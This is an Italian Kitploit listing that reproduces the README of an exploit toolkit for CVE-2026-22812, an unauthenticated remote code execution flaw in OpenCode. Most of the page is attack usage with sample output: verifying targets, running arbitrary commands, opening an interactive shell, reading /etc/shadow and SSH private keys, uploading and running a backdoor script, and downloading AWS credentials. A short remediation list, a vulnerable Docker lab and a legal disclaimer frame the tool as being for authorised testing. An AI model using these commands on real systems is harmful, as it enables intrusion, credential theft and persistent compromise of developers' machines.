Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22812-exploit — Toolkit di sfruttamento per CVE-2026-22812 (RCE non autenticata in OpenCode) che fornisce shell interattiva, esecuzione arbitraria di comandi, upload/download di file ed enumerazione di sistema per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

Toolkit di sfruttamento per CVE-2026-22812 (RCE non autenticata in OpenCode) che fornisce shell interattiva, esecuzione arbitraria di comandi, upload/download di file ed enumerazione di sistema per test di sicurezza autorizzati.

Vedi Repository
3367 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento Exploit CVE-2026-22812

Python CVSS

Toolkit di sfruttamento completo per CVE-2026-22812 - RCE non autenticata OpenCode


🎯 Panoramica

Lo Strumento Exploit CVE-2026-22812 è un framework di sfruttamento completo per la vulnerabilità di esecuzione remota di codice non autenticata in OpenCode. Questo strumento fornisce molteplici metodi di sfruttamento, tra cui shell interattiva, operazioni sui file ed enumerazione del sistema.

Dettagli della Vulnerabilità

  • ID CVE: CVE-2026-22812
  • Versioni Affette: OpenCode < 1.0.216
  • Punteggio CVSS: 8.8 (Alto)
  • Vettore di Attacco: Rete
  • Autenticazione: Nessuna Richiesta
  • Impatto: Compromissione completa del sistema

✨ Funzionalità

🔓 Capacità di Sfruttamento

  • ✅ Creazione di Sessione Non Autenticata
  • ✅ Esecuzione Arbitraria di Comandi (RCE)
  • ✅ Shell Interattiva con cronologia dei comandi
  • ✅ Caricamento/Scaricamento File
  • ✅ Lettura Arbitraria di File
  • ✅ Creazione di Sessione PTY
  • ✅ Enumerazione del Sistema
  • ✅ Supporto Proxy (compatibile con Burp Suite)

📦 Installazione

Prerequisiti

  • Python 3.7+
  • pip
  • libreria requests

Installazione Rapida

root@kitploit:~
# Clona il repository
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Installa le dipendenze
pip3 install -r requirements.txt

Installazione Manuale

root@kitploit:~
pip3 install requests urllib3

🚀 Utilizzo

Sfruttamento di Base

1. Verifica che il Target sia Vulnerabile

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 --verify

Output:

root@kitploit:~
[+] Il target è VULNERABILE a CVE-2026-22812!
[+] ID Sessione: abc123def456

2. Esegui un Singolo Comando

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -c "id"

Output:

root@kitploit:~
[*] Creazione sessione...
[+] Sessione creata: abc123def456
[+] Il target è VULNERABILE!

[*] Esecuzione: id
[+] Comando eseguito con successo

uid=1000(developer) gid=1000(developer) groups=1000(developer)

3. Modalità Shell Interattiva

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -i

Sessione Interattiva:

root@kitploit:~
[+] Sessione creata: abc123def456
[+] Il target è VULNERABILE!

[*] Accesso alla modalità shell interattiva
[!] Digita 'help' per i comandi, 'exit' per uscire

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Lettura file: /etc/hostname
[+] File letto con successo (10 byte)
dev-server-01

developer@target$ exit
[*] Uscita...

📚 Utilizzo Dettagliato

Esecuzione di Comandi

root@kitploit:~
# Comando singolo
python3 exploit.py -t http://target:4096 -c "whoami"

# Comando complesso
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Comandi multipli
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"

Operazioni sui File

Leggi File

root@kitploit:~
# Leggi file sensibili
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa

Carica File

root@kitploit:~
# Carica script shell
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Carica binario
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Carica con esecuzione
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"

Scarica File

root@kitploit:~
# Scarica configurazione
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Scarica credenziali
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Scarica codice sorgente
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json

Enumerazione del Sistema

root@kitploit:~
# Raccogli informazioni sul sistema
python3 exploit.py -t http://target:4096 --sysinfo

Output:

root@kitploit:~
{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}

Rimedio

  1. Aggiorna immediatamente: npm install -g opencode-ai@latest
  2. Termina i processi: pkill -f opencode
  3. Controlla i log: Esamina i log di sistema per indicatori di compromissione
  4. Ruota le credenziali: Cambia password, chiavi SSH
  5. Verifica i sistemi: Controlla la presenza di backdoor

🧪 Configurazione del Laboratorio di Test

Utilizzo di Docker (Consigliato)

root@kitploit:~
# Dockerfile per OpenCode vulnerabile
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
root@kitploit:~
# Build ed esecuzione
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Test dell'exploit
python3 exploit.py -t http://localhost:4096 -i

Configurazione Manuale

root@kitploit:~
# Installa la versione vulnerabile
npm install -g [email protected]

# Avvia OpenCode
opencode

# In un altro terminale, esegui l'exploit
python3 exploit.py -t http://localhost:4096 --verify

⚠️ Non distribuire mai versioni vulnerabili in produzione!


📚 Riferimenti

Informazioni sulla Vulnerabilità

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
  • Avviso GitHub: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
  • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

⚠️ Disclaimer Legale

LEGGI ATTENTAMENTE

Questo strumento è fornito SOLO PER TEST DI SICUREZZA AUTORIZZATI.

❌ Utilizzo Proibito

  • Accesso non autorizzato ai sistemi
  • Scansione senza permesso
  • Qualsiasi attività illegale
  • Scopi dannosi
  • Sistemi di produzione senza autorizzazione

Avviso Legale

Gli autori:

  • NON approvano l'uso illegale
  • NON sono responsabili dell'uso improprio
  • NON supporteranno attività illegali
  • NON si assumono ALCUNA RESPONSABILITÀ

Utilizzando questo strumento, accetti di:

  • Ottenere la dovuta autorizzazione
  • Rispettare tutte le leggi
  • Accettare la piena responsabilità
  • Utilizzarlo in modo etico e responsabile

UTILIZZO A PROPRIO RISCHIO


⭐ Metti una stella se utile! ⭐
Solo per test di sicurezza autorizzati

Scarica lo strumento